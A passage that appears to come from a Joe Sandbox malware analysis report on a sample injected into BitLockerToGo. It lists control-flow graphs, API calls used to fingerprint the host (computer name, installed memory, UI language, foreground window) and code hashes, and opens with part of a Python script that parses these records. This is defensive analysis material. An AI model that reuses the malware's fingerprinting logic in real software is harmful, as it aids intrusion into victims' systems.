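    """Blocks with an edge to themselves: tight loops, the usual shape of inline decode loops."""
    return sorted({a for a, b in edges if a == b and a in blocks})


def callees(blocks):
    """Distinct subroutine addresses the function calls, for cross-referencing other records."""
    return sorted({c for b in blocks.values() for c in b.calls})


def api_blocks(blocks):
    """Map block id -> imports called from it."""
    return {b.nid: b.apis for b in blocks.values() if b.apis}


def parse_api_ref(line):
    """Parse 'Api.MODULE(args), ref: ADDR'; '?' (value not captured by the sandbox) becomes None."""
    m = _APIREF.search(line)
    if not m:
        return None
    args = [None if a == "?" else int(a, 16) for a in m[3].split(",")] if m[3] else []
    rec = {"api": m[1], "module": m[2], "args": args, "ref": int(m[4], 16)}
    if rec["api"] == "GetComputerNameExA" and len(args) == 3 and args[0] is not None \
            and args[0] < len(COMPUTER_NAME_FORMAT):
        rec["name_type"] = COMPUTER_NAME_FORMAT[args[0]]   # NameType argument
        rec["buffer_chars"] = args[2]                       # size argument as captured
    return rec


if __name__ == "__main__":
    for label, cfg in (("GetComputerNameExA function", CFG_GETCOMPUTERNAME),
                       ("decode-loop function", CFG_DECODE_LOOP)):
        blocks, edges = parse_cfg(cfg)
        print(label, "blocks:", len(blocks), "edges:", len(edges),
              "self-loops:", self_loops(blocks, edges),
              "calls:", [hex(c) for c in callees(blocks)], "apis:", api_blocks(blocks))
    for ref in (APIREF_COMPUTERNAME, APIREF_LDR):
        print(parse_api_ref(ref))
```

Feeding the long first record (function 4206d0) to `parse_cfg` and `callees` lists 43b8a0 among its callees; pairing that with the `ref` field of the LdrInitializeThunk line is how the records in this section can be tied together without the rendered graph. The self-loop heuristic is only a pointer to where to look: node 525 of the GetPhysicallyInstalledSystemMemory record, for example, is a single 2 KB block with no loop, so a large straight-line block is as worth inspecting as a looping one.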

Control-flow Graph

control_flow_graph 506 409b20-409b42 507 409b50-409bd0 506->507 507->507 508 409bd6-409c0f 507->508 509 409c10-409c29 508->509 509->509 510 409c2b-409c32 509->510 511 409c37-409c71 call 43b180 510->511
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: F0G0$u0H0
• API String ID: 0-422099039
• Opcode ID: b881b1e87e66fb038649869ed6fae0b7aa8f72ae8b1d30fcd66483a917feedd8
• Instruction ID: 4e53f72a6730409e84e8950ff4302d58b30d8e3923eaf88ad368f669c711bca4
• Opcode Fuzzy Hash: b881b1e87e66fb038649869ed6fae0b7aa8f72ae8b1d30fcd66483a917feedd8
• Instruction Fuzzy Hash: 1731E176A193409BD314DF74DC423A7B6E1ABCA304F04893DA591D7384E7B8C905C78A

Control-flow Graph

control_flow_graph 521 42af24-42af3f 522 42af40-42af66 521->522 522->522 523 42af68-42af6f 522->523 524 42af71-42af75 523->524 525 42af8b-42b86f 523->525 527 42af80-42af89 524->527 528 42b870-42b88a 525->528 527->525 527->527 528->528 529 42b88c-42b893 528->529 530 42b895-42b899 529->530 531 42b8ab-42b8b7 529->531 532 42b8a0-42b8a9 530->532 533 42b8d1-42b8f5 call 43d1d0 531->533 534 42b8b9-42b8bb 531->534 532->531 532->532 537 42b8fa-42b923 GetPhysicallyInstalledSystemMemory 533->537 535 42b8c0-42b8cd 534->535 535->535 538 42b8cf 535->538 539 42b930-42b951 537->539 538->533 539->539 540 42b953-42b989 call 41cfb0 539->540 543 42b990-42b9b8 540->543 543->543 544 42b9ba-42b9c1 543->544 545 42b9c3-42b9c7 544->545 546 42b9db-42b9e3 544->546 547 42b9d0-42b9d9 545->547 548 42b9e5-42b9e6 546->548 549 42b9fb-42ba05 546->549 547->546 547->547 550 42b9f0-42b9f9 548->550 551 42ba07-42ba0b 549->551 552 42ba1b-42ba6f 549->552 550->549 550->550 554 42ba10-42ba19 551->554 553 42ba70-42ba8a 552->553 553->553 555 42ba8c-42ba93 553->555 554->552 554->554 556 42ba95-42ba99 555->556 557 42baab-42bab8 555->557 558 42baa0-42baa9 556->558 559 42baba-42bac1 557->559 560 42badb-42bb5b 557->560 558->557 558->558 561 42bad0-42bad9 559->561 561->560 561->561
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B905
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID:
• API String ID: 3960555810-0
• Opcode ID: e2bc28477669437abcd8647a2a36832b370209f16c869da250ceeee04688e1e1
• Instruction ID: 54cfc295aa3b4cc8fe636e1ca64ff8d61a008010a8d39a073fc19eee162a7ecf
• Opcode Fuzzy Hash: e2bc28477669437abcd8647a2a36832b370209f16c869da250ceeee04688e1e1
• Instruction Fuzzy Hash: 8491A37050C3918AD729CF29D55076BBBE0EF97305F54085EE1CA9B3A2D33A8505CB5B

Control-flow Graph

control_flow_graph 562 42b4e1-42b86f call 4315d0 call 408040 568 42b870-42b88a 562->568 568->568 569 42b88c-42b893 568->569 570 42b895-42b899 569->570 571 42b8ab-42b8b7 569->571 572 42b8a0-42b8a9 570->572 573 42b8d1-42b923 call 43d1d0 GetPhysicallyInstalledSystemMemory 571->573 574 42b8b9-42b8bb 571->574 572->571 572->572 579 42b930-42b951 573->579 575 42b8c0-42b8cd 574->575 575->575 578 42b8cf 575->578 578->573 579->579 580 42b953-42b989 call 41cfb0 579->580 583 42b990-42b9b8 580->583 583->583 584 42b9ba-42b9c1 583->584 585 42b9c3-42b9c7 584->585 586 42b9db-42b9e3 584->586 587 42b9d0-42b9d9 585->587 588 42b9e5-42b9e6 586->588 589 42b9fb-42ba05 586->589 587->586 587->587 590 42b9f0-42b9f9 588->590 591 42ba07-42ba0b 589->591 592 42ba1b-42ba6f 589->592 590->589 590->590 594 42ba10-42ba19 591->594 593 42ba70-42ba8a 592->593 593->593 595 42ba8c-42ba93 593->595 594->592 594->594 596 42ba95-42ba99 595->596 597 42baab-42bab8 595->597 598 42baa0-42baa9 596->598 599 42baba-42bac1 597->599 600 42badb-42bb5b 597->600 598->597 598->598 601 42bad0-42bad9 599->601 601->600 601->601
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B905
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID:
• API String ID: 3960555810-0
• Opcode ID: 46c556b050339564d6481be94656ffbdcda3a87a262d335a54f02c9bff1f8674
• Instruction ID: 3f400867d2956580dd49c97be4e04613b7d9567a1d88427644f00e943b0b1864
• Opcode Fuzzy Hash: 46c556b050339564d6481be94656ffbdcda3a87a262d335a54f02c9bff1f8674
• Instruction Fuzzy Hash: 4F81C17050C3918AD729CF29955076BBBE0EF9B304F54086EE1CA9B3A2D73A8505CB5B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: R!S!
• API String ID: 0-2754619947
• Opcode ID: 52d76bbe8310a125ddcf00cd6d5e377379fdac9428efc12511a24353b55c4c7f
• Instruction ID: 22768bf2a63544a0fa42277a88cb5a1c88805c41609c8fbde0d5921a7d891c69
• Opcode Fuzzy Hash: 52d76bbe8310a125ddcf00cd6d5e377379fdac9428efc12511a24353b55c4c7f
• Instruction Fuzzy Hash: 0981353260A3059BD7248F59D88076BB3E1EFD8308F15983DE889873E0EB75AC45C796
APIs
• LdrInitializeThunk.NTDLL(0043E8FA,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043B8CE
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: D]+\
• API String ID: 0-1174097187
• Opcode ID: 24f6b2abcc05d60b50e09c5eaa46cb696ba0d2ef34d344d39bac536f1b5cf5a5
• Instruction ID: 3389804a12a58ae7d12d741fd037ec205b2dabcb9ec0da44ff2f953e8839fc47
• Opcode Fuzzy Hash: 24f6b2abcc05d60b50e09c5eaa46cb696ba0d2ef34d344d39bac536f1b5cf5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC2178756082108BC7189F48DCC07777362FB8E308F29653DDE926B362D7356816DB89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 9.
                                                                                                                                                                                                              • API String ID: 0-3220845746
                                                                                                                                                                                                              • Opcode ID: 777c80cead33f09d81cbab6db243f49e875268cad53d40fe9d4007dab8e425f3
                                                                                                                                                                                                              • Instruction ID: b2fa3e6f3e6fb128fe1ebaea8aef44d6a6eb515cdfb7d3fc60a1dce0c6074baa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 777c80cead33f09d81cbab6db243f49e875268cad53d40fe9d4007dab8e425f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601F4746081109BD7288F14CC80B3673A0EB4A324F55632DFE54A73D1C3398C0197CD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 2367075616557c33f7ffbe59e2a2c0268bee6d58cddcdd5f79e8d22a0b4a0a75
                                                                                                                                                                                                              • Instruction ID: c37e6478394e99d6c226e2b8045bd2617926b0e0af92e7ab6293a6faaa0b87d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2367075616557c33f7ffbe59e2a2c0268bee6d58cddcdd5f79e8d22a0b4a0a75
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3352F4B5A04B008FD714EF38D5853AABBE1AF89314F04893ED4DB87791E638E485CB46
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: b6bcf7040bbed57b8857a325a4d569f313bf0ba44939ac1ee392cd0bc1efbd62
                                                                                                                                                                                                              • Instruction ID: 3ef0172c1b0fd6102452f61b1f682a93a5c702fb0ee973861230a87bdf11b20f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bcf7040bbed57b8857a325a4d569f313bf0ba44939ac1ee392cd0bc1efbd62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6715736B043119BD328DF18CC9267BB393EBD9314F26D43EDAD697391EB7458058684
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4f645e16e258cd7c0f8e2478ce1df4953a84b79102b81f51bf9cb67e95845a38
                                                                                                                                                                                                              • Instruction ID: dd1b00007a37aaeb0e23c46eaef9a59656b39fbe93189a0e2ad26de6f0aa502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f645e16e258cd7c0f8e2478ce1df4953a84b79102b81f51bf9cb67e95845a38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8611179104701CFD3218F64EC94B16B7B5FF8A311F168839F946876B1EB74A862CB19
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0615696a12da15777458fcf2419a99d2334abb0ad704679dba1f4d1373da7fa6
                                                                                                                                                                                                              • Instruction ID: 50319d9450d2bc1b12e559979c08195f63fb789cd929903e41858edafaf35703
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0615696a12da15777458fcf2419a99d2334abb0ad704679dba1f4d1373da7fa6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4136706193054BD31CDF25C8527AFB792FFC6304F54DD7DE142CA2A9EB7885058A8A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a131e69dfc0ff879a6e9dcd4b5edb0d3979d92747278feec77fe8072e7b7bb9b
                                                                                                                                                                                                              • Instruction ID: ec9ea2fa370fc3f4155ca673735427f0cab971e73592dcf601490d08f7a15edc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a131e69dfc0ff879a6e9dcd4b5edb0d3979d92747278feec77fe8072e7b7bb9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87218078610601DFD328CF19C880B26B7B2FF89310F199569E8558B3A5DB79E829CB84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fed63a07b80184dd5c583fa40cd8ccaf258bfa8e81da5fbed10aa4f0cdac0a22
                                                                                                                                                                                                              • Instruction ID: 794fcfeaf2393bc4de24d234b0b73bc852a7d0c1d48979df45f9615cc5615d1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed63a07b80184dd5c583fa40cd8ccaf258bfa8e81da5fbed10aa4f0cdac0a22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8C012B8B061429FC28A8F10ED889397675BB8BA0EB012928E513D3260CB208402AA1C

                                                                                                                                                                                                              Control-flow Graph

control_flow_graph 475 43b800-43b811 476 43b842 475->476 477 43b882-43b888 475->477 478 43b892-43b894 475->478 479 43b860-43b866 call 43a280 475->479 480 43b880 475->480 481 43b840 475->481 482 43b890 475->482 483 43b826-43b83f call 43cdb0 RtlReAllocateHeap 475->483 484 43b818-43b81f 475->484 485 43b848-43b851 call 43a280 475->485 486 43b86f-43b87e call 43a2a0 475->486 476->485 477->482 479->486 480->477 481->476 482->478 483->481 484->477 484->478 484->480 484->481 484->482 484->483 484->486 485->479 486->480
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,,yC,00000000,?,00000000,0043792C,00000000,00004000,?,?,?,?,?,?,?), ref: 0043B832
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeap
• String ID: ,yC
• API String ID: 1279760036-3745428483
• Opcode ID: 5d1e9913e8770d5a97fdd42fa78f7a2d659a10438cdbc160b2d273c72e304128
• Instruction ID: 33fd48210bbda35ad11459605df245acdc4e14f42742f7d3b222364fd982cad6
• Opcode Fuzzy Hash: 5d1e9913e8770d5a97fdd42fa78f7a2d659a10438cdbc160b2d273c72e304128
• Instruction Fuzzy Hash: 92F0AFFA548210DFC2045F24BC01A973768AF8F315F035479F80943221DB3AE414C69B

Control-flow Graph

control_flow_graph 495 435112-435130 call 43d1d0 498 435132 495->498 499 435134-435137 495->499 498->499 500 43513b-435156 GetUserDefaultUILanguage 499->500 501 435139 499->501 502 435158-43515b 500->502 501->500 503 4351a7-4351d6 502->503 504 43515d-4351a5 502->504 504->502
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 0043513B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: DefaultLanguageUser
• String ID: jw
• API String ID: 95929093-279606605
• Opcode ID: 8fd143bed7b4565bde4c5d5bd80363675cd6eb861a49e854194b01a760ecf153
• Instruction ID: 31f33ac9812ae1d53d5c8aaf197ee06a540952fd9b70975da2aecf9ed20f900e
• Opcode Fuzzy Hash: 8fd143bed7b4565bde4c5d5bd80363675cd6eb861a49e854194b01a760ecf153
• Instruction Fuzzy Hash: 57110832A1AB504BC7288F39C9503AAB7D26FC9710F5AAB3DD895873D4DA388801C706

Control-flow Graph
control_flow_graph 505 40c946-40caae CoInitializeEx * 2
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040C94A
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA8E
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 8089acbefa084f7ef2651a4c6fa76e1977f34e7290a4e2dd1fa490c46b165ff3
• Instruction ID: 269ea005b952a61152a448765d35d9cf6bfb96e117828a87c9f9db2dbc4edc09
• Opcode Fuzzy Hash: 8089acbefa084f7ef2651a4c6fa76e1977f34e7290a4e2dd1fa490c46b165ff3
• Instruction Fuzzy Hash: 0741E6B4D10B40AFD370EF39CA0B7127EB4AB05250F504B2DF9EA866D4E635A4198BD7

APIs
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 0ef94f9000e4fa4065d14da9d66028db5585366479a6b6835adb188af45f5b00
• Instruction ID: 1c95711534b0e00a0aa94289c6828f8df1262393bc50859e910db5b8208d93bc
• Opcode Fuzzy Hash: 0ef94f9000e4fa4065d14da9d66028db5585366479a6b6835adb188af45f5b00
• Instruction Fuzzy Hash: FE31293261C79187C72A8F34D8507EB7BE2AFCB305F88856DD4CA9B291D7354406C746

APIs
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 4bc0424f0c91a3473afd753e943cd2a984b264c4950c3bc1bd7e5cd3455c717b
• Instruction ID: dc45a77adc038e9641dbfc558196eecdfe656b94b3adc5cf68800eb90a64c239
• Opcode Fuzzy Hash: 4bc0424f0c91a3473afd753e943cd2a984b264c4950c3bc1bd7e5cd3455c717b
• Instruction Fuzzy Hash: 6F21277261865187C7298F30D8517DB77A2ABCB305F88C53DD4CA9B291DB340406C786

APIs
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: aeb064ca5cfb78ac6912e124f915a8d66ec1b88869630cfda61cc37693389921
• Instruction ID: 9bd453f60cb619137add31752274503119b01500be904c84702a9a637c675632
• Opcode Fuzzy Hash: aeb064ca5cfb78ac6912e124f915a8d66ec1b88869630cfda61cc37693389921
• Instruction Fuzzy Hash: B4214572B1865187C7298F34D8507EBB7E2ABCB305F88C53DC4CA9B291EA340806C782

APIs
• GetForegroundWindow.USER32 ref: 0043BA3B
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 2b8e04cabfe00ad42552470da3ea8c51232b6cecaaf7991224432e00482ef3bf
• Instruction ID: ae2376af06e43d591e544aa1d100e19403503e7caaec75d4ad812d5730cd0d8f
• Opcode Fuzzy Hash: 2b8e04cabfe00ad42552470da3ea8c51232b6cecaaf7991224432e00482ef3bf
• Instruction Fuzzy Hash: 27017BBBC152304FC718DF68DD4069A33A4E7C1305F06E67DEC45AB220EB79990687CA

APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAE5
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: b345dab2524d561905fef3b01f005a64e6cd4460623fa95d17846ecb88945d2d
• Instruction ID: d11aeb08f2805c5f0aad2d3c517a9dc16d9abdece8bbcf387af0b6eb180b2945
• Opcode Fuzzy Hash: b345dab2524d561905fef3b01f005a64e6cd4460623fa95d17846ecb88945d2d
• Instruction Fuzzy Hash: 1FE0927028434177E2225B289D57F5437515B02B60F240759F3E1EE2D6C9E07101850C

APIs
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 062d0a6d3dd76c98753908fade2de77ad8c8f7e68bd7143df4126e6766d6e360
• Instruction ID: 94eff057e395c15a7efe109b129d3175210669c0d52992a7800d15db9272d1b1
• Opcode Fuzzy Hash: 062d0a6d3dd76c98753908fade2de77ad8c8f7e68bd7143df4126e6766d6e360
• Instruction Fuzzy Hash: E3F074B45097018FD354DF68D4A871BBBE0EB85304F11882CE5998B291DBB6A558CF86

APIs
• GetForegroundWindow.USER32 ref: 0043BA3B
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: f69193f1f452a33e5ec320b770d671c9ec50282a28d43311b2e95074ca0a3c72
• Instruction ID: e75b93aa63c92e233c5a34bfb4cd482a6e30767127076f34543c5c249691ecbb
• Opcode Fuzzy Hash: f69193f1f452a33e5ec320b770d671c9ec50282a28d43311b2e95074ca0a3c72
• Instruction Fuzzy Hash: 9FE092BFD021148FD714EFA0EC105543761F786319705827CDC1517211DA39691BC7C4

APIs
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 8dcff309c6ae7edc8a12e65a504d0c3619956fdc6f5f9a6ce592b71dbf4d3e24
                                                                                                                                                                                                              • Instruction ID: 2191a691f1676ea1963644dabb8b0ea44723e772f2b4e0db76d62e2edecdfe6e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dcff309c6ae7edc8a12e65a504d0c3619956fdc6f5f9a6ce592b71dbf4d3e24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F074B05097058FE354DF14D4A8B5BBBF0BB89314F11881DE09A8B391D7B5A648CF82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000,004140DF,00000000), ref: 0043A2C0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 7251222d94dd1d3facac15d7c2bfa60f6c733de751ea4508c3315d3f2373ab22
                                                                                                                                                                                                              • Instruction ID: ab5d903c12688676c9f1e99bc377567e9c78a850a27ed3e97b7aac3b680b9858
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7251222d94dd1d3facac15d7c2bfa60f6c733de751ea4508c3315d3f2373ab22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BD0C975409122EBC6902F28BC15BDB3B649F4A731F0708A2F8406A069C665AC918AD8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,004087C1,?,004087C1,00001388), ref: 0043A290
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: f1522b5dab1cf2da11f37c44463eac122e6e562cc74522ac74552970da84ba70
                                                                                                                                                                                                              • Instruction ID: f97d0d59657208641b7809d7aa9df25db84e5ea9402b5a29a6046ea1d043b816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1522b5dab1cf2da11f37c44463eac122e6e562cc74522ac74552970da84ba70
